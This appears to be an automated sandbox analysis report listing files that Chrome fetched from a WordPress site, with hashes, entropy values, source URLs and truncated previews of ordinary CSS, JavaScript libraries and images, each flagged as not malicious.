                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (31267), with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):31436
                                                                                                                                                                                                                                        Entropy (8bit):4.754057261230087
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:1302BFB9068A5C29141081B7D7FCABF5
                                                                                                                                                                                                                                        SHA1:03C75AD4D9E3423344C091A669EDB7C2DDF47EAB
                                                                                                                                                                                                                                        SHA-256:E1626118BB57D9A4C8530CA66BF44A5BEDCF1282729CFCB1B41F93B4E7CE4E29
                                                                                                                                                                                                                                        SHA-512:AD059337B1D9163CC14C6FF91D0AD23F9D280323145A1E259EE5AA9703D11ED7BD5E5C9C2E949AD0F8DDD54B38D39FE0B397918677D24E537D9BA4423A2318C9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_a84aefbe1669acc7199e3303ac52a4b0.css
                                                                                                                                                                                                                                        Preview:/*!.. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome.. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License).. */.@font-face{font-family:'FontAwesome';font-display:swap;src:url(//mipscenter.com/wp-content/themes/milo/css/../fonts/fontawesome-webfont.eot?v=4.7.0);src:url(//mipscenter.com/wp-content/themes/milo/css/../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0) format('embedded-opentype'),url(//mipscenter.com/wp-content/themes/milo/css/../fonts/fontawesome-webfont.woff2?v=4.7.0) format('woff2'),url(//mipscenter.com/wp-content/themes/milo/css/../fonts/fontawesome-webfont.woff?v=4.7.0) format('woff'),url(//mipscenter.com/wp-content/themes/milo/css/../fonts/fontawesome-webfont.ttf?v=4.7.0) format('truetype'),url(//mipscenter.com/wp-content/themes/milo/css/../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular) format('svg');font-weight:400;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;fon
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65470)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):642428
                                                                                                                                                                                                                                        Entropy (8bit):5.534481975660463
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:CE5BD54ADE787E3757D0D32FF267280A
                                                                                                                                                                                                                                        SHA1:33DAA933561E55F9988E2BE25448078F97EF0DB2
                                                                                                                                                                                                                                        SHA-256:F03340295D792ADB763C777EAA96039AA831C2402BD7CBC970DB44931FA736B8
                                                                                                                                                                                                                                        SHA-512:11CA21748CD36A3EE4BCFD3298CDD188AC5A9EF7F01AF8ECAE6A2E15139E2DBB485CD5E04010D479EEB0ADFECBE1B8304A25C66512E2D8094390E4385AB08A62
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js
                                                                                                                                                                                                                                        Preview:/*! For license information please see web3.min.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web3=t()}(this,(()=>(()=>{var e={1166:(e,t)=>{"use strict";function r(e){if(Array.isArray(e)){const t=[];let n=0;for(let i=0;i<e.length;i++){const o=r(e[i]);t.push(o),n+=o.length}return h(o(n,192),...t)}const t=g(e);return 1===t.length&&t[0]<128?t:h(o(t.length,128),t)}function n(e,t,r){if(r>e.length)throw new Error("invalid RLP (safeSlice): end slice of Uint8Array out-of-bounds");return e.slice(t,r)}function i(e){if(0===e[0])throw new Error("invalid RLP: extra zeros");return d(u(e))}function o(e,t){if(e<56)return Uint8Array.from([e+t]);const r=p(e),n=p(t+55+r.length/2);return Uint8Array.from(l(n+r))}function s(e,t=!1){if(null==e||0===e.length)return Uint8Array.from([]);const r=a(g(e));if(t)return r;if(0!==r.remainder.length)throw new Error("inva
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (57456)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):58782
                                                                                                                                                                                                                                        Entropy (8bit):5.756254773947587
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:3063E8D6EA228AF7037AED513120B695
                                                                                                                                                                                                                                        SHA1:DA09C7664D553A9B4373E26D17364DF23D0B8F76
                                                                                                                                                                                                                                        SHA-256:860A431087B39F9FD81E9F117B94AF217ED1F2A23713E866748916569E4FB450
                                                                                                                                                                                                                                        SHA-512:3D5D82B85ABF008CFE80627E3CC209AC8AB550ED3B1E1BCE93B29DC161059EF7ABE369770498BE0CD511A209D69495085DC2302C12159E45E35205772508E099
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.google.com/js/th/hgpDEIezn5_YHp8Re5SvIX7R8qI3E-hmdIkWVp5PtFA.js
                                                                                                                                                                                                                                        Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function e(F){return F}var Y=function(F){return e.call(this,F)},p=function(F,V,A,D,U,u,H,I,C,c,P,R){R=65;{P=33;while(0==![void(false==![])])try{if(R==49)break;else if(R==D)P=33,R=43;else if(R==65)C=H,I=B.trustedTypes,R=V;else{if(R==89)return C;if(R==37)B.console[U](c.message),R=A;else if(R==V)R=I&&I.createPolicy?64:89;else if(R==43)R=B.console?37:A;else{if(R==A)return P=33,C;R==64&&(P=F,C=I.createPolicy(u,{createHTML:Y,createScript:Y,createScriptURL:Y}),R=A)}}}catch(J){if(P==33)throw J;P==F&&(c=J,R=D)}}},B=this||self;(0,eval)(function(F,V){return(V=p(90,70,69,76,"error","ad",null))&&F.eval(V.createScript("1"))===1?function(A){return V.createScript(A)}:function(A){return""+A}}(B)(Array(Math.random()*7824|0).join("\n")+['//# sourceMapp
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12885), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):12885
                                                                                                                                                                                                                                        Entropy (8bit):4.716081380250743
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:420EDFE0E6891FFD755530BE77544FE3
                                                                                                                                                                                                                                        SHA1:B93C38A5F24D910BADA7C65BEB9BFB86A1739636
                                                                                                                                                                                                                                        SHA-256:ACA52D1D4A220A240B5B88392734858189E5900F19B1B187C5A16F9861F6FFFD
                                                                                                                                                                                                                                        SHA-512:734C0BC8ACF3EE6648EEDBB4D038D27A8552D3CB505EBFD5E1FA58BBD396DF14C60CFD18C6F6A0F7D38BD4E20A96FDAF52B07FECA9D9E84EB0253AE0DD2DEE2F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_0793ca35f5d388181a5e6c01688af110.css
                                                                                                                                                                                                                                        Preview:#wpadminbar>.godaddy-styles *,.godaddy-styles *{font-family:GD Sherpa,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;line-height:1.4}#wpadminbar>.godaddy-styles .is-bigger,.godaddy-styles .is-bigger{font-size:1.1em!important;font-weight:500!important}#wpadminbar>.godaddy-styles .components-button,#wpadminbar>.godaddy-styles.components-button,.godaddy-styles .components-button,.godaddy-styles.components-button{border:0;border-radius:6px;box-shadow:none;font-size:1em;height:auto;line-height:1;padding:1.25em;transition:background-color,color,.2s ease-in-out}#wpadminbar>.godaddy-styles .components-button:disabled,#wpadminbar>.godaddy-styles.components-button:disabled,.godaddy-styles .components-button:disabled,.godaddy-styles.components-button:disabled{opacity:.5}#wpadminbar>.godaddy-styles .components-button>svg,#wpadminbar>.godaddy-styles.components-button>svg,.godaddy-styles .components-button>svg,.godaddy-styles.components-button
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (37027), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):37029
                                                                                                                                                                                                                                        Entropy (8bit):4.991736206653211
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:F030C6DE3A283BD89D8EA5370DE446C8
                                                                                                                                                                                                                                        SHA1:E6EEF6C6C12DE2A9C5ECEF495CA2F8D80BF8C532
                                                                                                                                                                                                                                        SHA-256:313B2B293190F505D31BA5592EEA41FEE7D56467839BD0E3BA486C083EFAD180
                                                                                                                                                                                                                                        SHA-512:326A8BA83226EDE1D33B4E505110A0DA294E5A8160A30E0B0BAC98DCFF0822F18021856BE9D74F803F8CA0703C08C4B43CA5EBCC8B26F0F06B9E89359DE71765
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_670c6b26a458600251838ce65c0c44a2.css
                                                                                                                                                                                                                                        Preview:html,body{margin:0;padding:0;height:100%;width:100%}body{overflow-x:hidden}.site{position:relative;min-height:100vh}a.file:after{display:inline-block;margin-left:.3em;content:"\f016";-webkit-transform:translate(0,0);transform:translate(0,0);font:normal normal normal .875rem/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}a.file.zip:after{content:"\f1c6"}a.file.pdf:after{content:"\f1c1"}a.file.doc:after,a.file.docx:after{content:"\f1c2"}a.file.ppt:after,a.file.pptx:after{content:"\f1c4"}a.file.xls:after,a.file.xlsx:after{content:"\f1c3"}a.file.external:after{content:"\f08e"}hr{clear:both}hr:before,hr:after{display:table;content:" "}hr:after{clear:both}h1,.h1,h2,.h2,h3,.h3{margin-top:1rem}h1,.h1{font-size:2.5625rem}h2,.h2{font-size:2.125rem}h3,.h3{font-size:1.75rem}h4,.h4{font-size:1.25rem}h5,.h5{font-size:1rem}h6,.h6{font-size:.875rem}.page-header{padding-bottom:.625rem;margin:2rem 0;border-bottom:1px solid #eee}.l
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6175)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):289890
                                                                                                                                                                                                                                        Entropy (8bit):5.560897486777743
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:79C05AFCD9DAD12C5A5CFBB75D47B88D
                                                                                                                                                                                                                                        SHA1:167233B9802245227C8BA44FBD440B5A74820432
                                                                                                                                                                                                                                        SHA-256:C8DA51AB8C0C79DD5078A445649225BE0AF7F79E35CF32183F81842CEBFB5C48
                                                                                                                                                                                                                                        SHA-512:83678F3274B40DD4EEBDC0213BA7E5B07F896649E4A08430A2A90164483FD0EE65AA6773177C0F041016EDD6D15823830C32E5CB142C9510DEC1676CF6B3A60F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-KQXXJ4Q
                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__jsm","vtp_javascript":["template","(function(){return function(){try{var a=window[window.GoogleAnalyticsObject],b=document.querySelectorAll('iframe[src*\\x3d\"practisforms\"]');if(a){var c=a.getAll()[0];var d=new window.gaplugins.Linker(c);for(a=0;a\u003Cb.length;a++)b[a].src=d.decorate(b[a].src)}}catch(e){}}})();"]},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":"UA-117802564-8"},{"function":"__v",
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 1536 x 922, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):677681
                                                                                                                                                                                                                                        Entropy (8bit):7.995409355729358
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:C88E9670AA0A44CCC8BE6389DA713AE1
                                                                                                                                                                                                                                        SHA1:B072C7A2E13B32C8A9C34D088B45CBBB6409061D
                                                                                                                                                                                                                                        SHA-256:CBBC34E55B27A409D428B528710DE3250EB181682C3E547455AE70E36D5F5048
                                                                                                                                                                                                                                        SHA-512:664D939C48B46D61AE0CE46024E45FC237F929AAD35B21918403D3D97DC05781596870B287227209EF2AFC552B598C5492E8C1372F357F30F06DD26F62FB39C1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............I....V.IDATx.... .........J{.6.lr(..)..*.J..J......._.....a..,..E.....<..{..NH 0.).Y..v.M..t.]....r#1..O.yn!W..`...f....u)M$..Cf..hBD.(...O.K...[i..l.f.`..u......(..)y.8.".1....Wx.P.z..A7..=.S..#..mc:8|..|uk..$.......!..5...J}%.s....~....7BY.....1.V......E.oe.{*..G.if.4..,...L...TE.{...."ET.2..+u..!0)......... ..... ...!k".j.....8.. :..q..Q.]....[......$.f&..=Ak..<..g.......$..X....=D...1..-..uF._....,.Bi.C.-k....j..<.s3K..IJ...)H.rW..(.yx.G.~PUm.....H!.d.d..a.y.k....'.k..N...N.d.=yK.;..S..f...G...l..X^...a.q..ky..../V..~.z)#.x.1lrsg3.A.kgDKa.{.B........{........O.|......Bl$.#.F.qr.Z.Ia...PW7-..>}U%...aKs.{X&9s$....e.\...a(.....v..Mn[.......f...x........Hh...&d.NR..{....#.?...#..h.H{.K......6...xH0.EGX....Q.b.@........6m.@@..8..,.3.......d.w...K..L.."......wB..V.x=...v.d2.L>4*]....$....6....-r.....s.;..8..__....q..Y#.'....8Us...q'.........&....$-. ..y.>`...p.........x.@.....l.Y.?...@........_=wb.......]e..f.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (450)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1184
                                                                                                                                                                                                                                        Entropy (8bit):4.989872879760427
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:7A387A3D75DEB18CDCE8121E2925BDD6
                                                                                                                                                                                                                                        SHA1:5C5728B754EE37FC2E1C7523AE946DC71C69D1B1
                                                                                                                                                                                                                                        SHA-256:9532284D2725BB77083F90F7769C7193104A7337B8E964DDF3FD21A9BE8A2340
                                                                                                                                                                                                                                        SHA-512:C6429493AF7CE34818A03A39F7A563D113CDAB629FED12E69044E0F0DC3CD1CA8E047A082415783D1FD522EE7F2F65AA9D73B59401A852BCBCE72B027B49DA58
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_1638974264a50e67fbfefe35c0332581.js
                                                                                                                                                                                                                                        Preview:/*! http://tinynav.viljamis.com v1.2 by @viljamis */.(function($,window,i){$.fn.tinyNav=function(options){var settings=$.extend({'active':'selected','header':'','indent':'- ','label':''},options);return this.each(function(){i++;var $nav=$(this),namespace='tinynav',namespace_i=namespace+i,l_namespace_i='.l_'+namespace_i,$select=$('<select/>').attr("id",namespace_i).addClass(namespace+' '+namespace_i);if($nav.is('ul,ol')){if(settings.header!==''){$select.append($('<option/>').text(settings.header));}.var options='';$nav.addClass('l_'+namespace_i).find('a').each(function(){options+='<option value="'+$(this).attr('href')+'">';var j;for(j=0;j<$(this).parents('ul, ol').length-1;j++){options+=settings.indent;}.options+=$(this).text()+'</option>';});$select.append(options);if(!settings.header){$select.find(':eq('+$(l_namespace_i+' li').index($(l_namespace_i+' li.'+settings.active))+')').attr('selected',true);}.$select.change(function(){window.location.href=$(this).val();});$(l_namespace_i).aft
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1149)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):9188
                                                                                                                                                                                                                                        Entropy (8bit):5.086725695576302
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:352AB35195150C2A91DC3B538B011503
                                                                                                                                                                                                                                        SHA1:26CB2E72E5B282E53503F6C1F00221DE669FD08F
                                                                                                                                                                                                                                        SHA-256:1E35336DA6A034128CA62985B290E88DF05F9B030DDB511B10F05CB64A28A197
                                                                                                                                                                                                                                        SHA-512:114DDBF440DE4AA32EA15BF0845A45DF1DADE8A9EC4F02DB8F594E213874A26F1D6AB5C0CD0D162D5ADC1E57E90DDEE01EADBC8CDA4AA5BE7C952FACB104BA9D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_36a0c64573c39884cdd5b91f8dc1cdf0.js
                                                                                                                                                                                                                                        Preview:(function($){'use strict';var practiscr=practiscr||{};practiscr.getPostUrl=function(elm){var ajaxurl=elm.attr("data-ajaxurl");ajaxurl=JSON.parse(ajaxurl);ajaxurl=ajaxurl.join('.').replace(/\|/g,'/');return ajaxurl;};practiscr.ajaxPost=function(parent,data,cb){return jQuery.ajax({type:"POST",url:practiscr.getPostUrl(parent),data:data,dataType:"json",success:function(rtn){if(!rtn.success){if(rtn.err.length){var errorMessage='<div class="pcr-error-message"><p><strong>Error:</strong></p><ul>';for(var i=0;i<rtn.err.length;i++){errorMessage+='<li>'+rtn.err[i]+'</li>';}.errorMessage+='</ul></div>';$('.pcr-response-message').html(errorMessage);practiscr.enableSubmit();return cb(rtn.err);}}else{return cb(null,rtn);}},error:function(rtn){alert('An unknown error has occurred. E01');practiscr.enableSubmit();}});};practiscr.submit=function(e){var t=$(this);var parent=t.closest(".pcr-review-form");e.preventDefault();$('.pcr-response-message').html('');if($('#pcr-submit').hasClass('pcr-pagination-lin
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):106284
                                                                                                                                                                                                                                        Entropy (8bit):5.1765669284907
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:1022DA4428EE88A52F232C7DF615A406
                                                                                                                                                                                                                                        SHA1:58472141CB0B3433F72F5B7C646921C674FAF97A
                                                                                                                                                                                                                                        SHA-256:75E679075D07B2A6B6D3FD547295F91D4DBA6E47C1FC5E5DD18213CC7DDDA493
                                                                                                                                                                                                                                        SHA-512:95A95C4147911EC37D68DE8E8E31F85738FC7D15082653B837ECE3CD4A92A00598A1185499820556AE806AFFD5919109C507BD3F8607BB5EE9F9CDD76E307925
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://img1.wsimg.com/signals/js/clients/scc-c2/scc-c2.min.js
                                                                                                                                                                                                                                        Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("scc-c2",[],e):"object"==typeof exports?exports["scc-c2"]=e():t["scc-c2"]=e()}(self,(()=>(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{_isDebug:()=>v,debug:()=>w,error:()=>h,info:()=>m,log:()=>m,setDebug:()=>b,warn:()=>g});var n={};t.r(n),t.d(n,{cmdLogEvent:()=>Gi,cmdLogPerf:()=>zi});var r,o,i,a,c,u=(r="",i={document:o=Object.create({get cookie(){return r},set cookie(t){r=t}})},a={},"undefined"==typeof window?{window:i,document:o,navigator:a}:{window:window||i,document:window.document||o,navigator:navigator||a}),f=function(){return u.window},s=functi
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=1, orientation=upper-left], progressive, precision 8, 1536x922, components 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):122607
                                                                                                                                                                                                                                        Entropy (8bit):7.984320072644662
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:E4A1F1113284160FC4EF800041C7B496
                                                                                                                                                                                                                                        SHA1:F0986DEFDDDB9321B9CFB3FA41062DEAF961C2D3
                                                                                                                                                                                                                                        SHA-256:85194BC3D4813E5053A008E8CAE547036BDCEDDD07E5C66944DC8382ED79204D
                                                                                                                                                                                                                                        SHA-512:BD1E70554508DB8F3574827E338ABEAAF022BBD07DF2B8FE55508A635E15C593C122C7B5DBA08103D2E7D96516BFF51B237003A00C7956379953FFDE05186DB3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....."Exif..II*....................................................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."..........7....................................................................s]...sK..N- .B$9.."q.h.'..8....K\.H.ZD..."4...H9...F.~./~...u..<.H..9I.%*.F...hg8..}.q..H....[....7.r...2..%.(r.......d...I.I.H.I.s\.".9...t8U...r.}?M.....:..E.H..B..d.....#.....8.d.~v.T...H..S@.3....E.L...................z!&.4Q...M........5.k5.S.?@x....kK....b.Q.K(.0 .. .>1$@.<vSR.U&....fQr.WZ.A.....L1.L5.G#.}....`F.(.)..i....8..!$H \.7 Zqi.ZA.!... ..@....9.I..(..B.s\=.S...~.....E+..E ..9.ro-1.........hgh...A.. .'.*T.Y.Z8....c3[rE$T.c...Ji @.."....D.@.@..)C....~Bc......].]W..t....V.eCb.[.V..T.at....1,.}..:R\...l..[O.z.>.....H...I.E.......#@LU.....kv......^v(f.]...^M._<..r.&=...D......P.. .=7J#Nr..i^...'.....4.N....qM...0w.*<q..=...%*xg5.^HBr.NI.!4...-p.i...zk....M.4.. J.=.n .......['....9..It..Z.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):618
                                                                                                                                                                                                                                        Entropy (8bit):4.860911013017384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:69067FBB8448D6FDC82335023D4A999F
                                                                                                                                                                                                                                        SHA1:8C51955867E8FB55F8D3209C74CC98660E36CD79
                                                                                                                                                                                                                                        SHA-256:74636BDEF49267CF610D04774AF6B0997DEF17A1EF1B55C53BBFB4553604DDAE
                                                                                                                                                                                                                                        SHA-512:F0672F714F6EDA6FCF6771813BD7CF83BE6CF86185517031E4149E706A5385416EDEC61FA6CF34A6C9FD480C7EE49ADEA3AF4C80854B473BDA78004EBB380656
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_de72fa617fd0f9a08176003df4de2044.js
                                                                                                                                                                                                                                        Preview:(function(){var elements;var windowHeight;function init(){elements=document.querySelectorAll('.reveal');windowHeight=window.innerHeight;for(var i=0;i<elements.length;i++){var element=elements[i];element.classList.add('reveal-hidden');}}.function checkPosition(){for(var i=0;i<elements.length;i++){var element=elements[i];var positionFromTop=elements[i].getBoundingClientRect().top;if(positionFromTop-windowHeight<=0){element.classList.add('reveal-visible');element.classList.remove('reveal-hidden');}}}.window.addEventListener('scroll',checkPosition);window.addEventListener('resize',init);init();checkPosition();})();
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 1536 x 922, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1516260
                                                                                                                                                                                                                                        Entropy (8bit):7.995183174713862
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:3C1170CBCF56A521CF0794D254BC5F53
                                                                                                                                                                                                                                        SHA1:7520087ADD35822C4987047B9A29D8F7D244F261
                                                                                                                                                                                                                                        SHA-256:ACD5F85F17F3433DC2AF621854B0328A08CF73E0123A8FFDC3FBA777FDAF8162
                                                                                                                                                                                                                                        SHA-512:42D93764DC15601EC5FECA9A85A221519D1472376B51B1D5FB1697A7C83EBB73B52AF5227F5E085E3A163F4EAB4C9355A58029AE1B0BFF99D0E0AC3B66F7DD1A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............^+......IDATx...Y.%[....{0.s.{.7.9.5...j.... ...zS..Z.....A.......w}.A....DI-Rj.H..d.XY...p.....`.'=.m.9~|...7.^.....v..q.._K.....aRZ..BH(....1...Z.6.DB..X....F[.2...Z.D.b....@H.b.t.c.^..../.s...''.W+..m[\.B@DaM..{.{....y..{..}......QJ...R......N....h.A)..P...D...D.1Fb.x.!FB......)&R.?.R"..$H.B.....u......:....p.....).k..b ..s..B.~".|/!..A....1.?>?....7..Z..N.RL.m........)F...mK...9ue.1.C ...m.l6....{.w..5....-.U.V..x..CJ..ki7-!D.6....."..;)x.v.z........ut...:...]....!b..if.&......c :.kq.e...eY...}...r..=.jjP......*c.U5U]...2.!@*..H..=...f.z..*?.[..U....=/_..dy..cR...u.PY..;........m].T.%xO.:.....[..r?..=A..*.U.7k.x....U.....gO..Z.0....h-..........p..=.y..G.<....:Yb.f.^..........Q....qp0c.x..9..bv....+..5.6.%h.p..S....ut.........x..\ ..V...>.B$.....Z.X...%........$...V(%lZ.s.c...bD.F.bD)A..|$.<.X...).b......O.|....1.=c.!.R.e.Lh..8......@.6..... DH).....'.D.....$...Og.<_'....S,..b.L...>$b..........T.....X.yg.....E."x..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (1433)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):15703
                                                                                                                                                                                                                                        Entropy (8bit):5.099386643225023
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:CBDC869E612F4E3B983D3B1623A13D4B
                                                                                                                                                                                                                                        SHA1:8FB95BCDEF2CEF7AA92068A4695B36B9041B6E32
                                                                                                                                                                                                                                        SHA-256:344B6D585561418FC75771C2FB86452A32565985A75A29AF01CD1C634B0E168E
                                                                                                                                                                                                                                        SHA-512:4F5546EDA008DA1BBAED732D076E5E3201A16419E737E7A392B25E3DFAD21A1816B9DCCFB69FBA4D2F5897044ED295F4E08A43F4F13A755D7397813D3EF00995
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
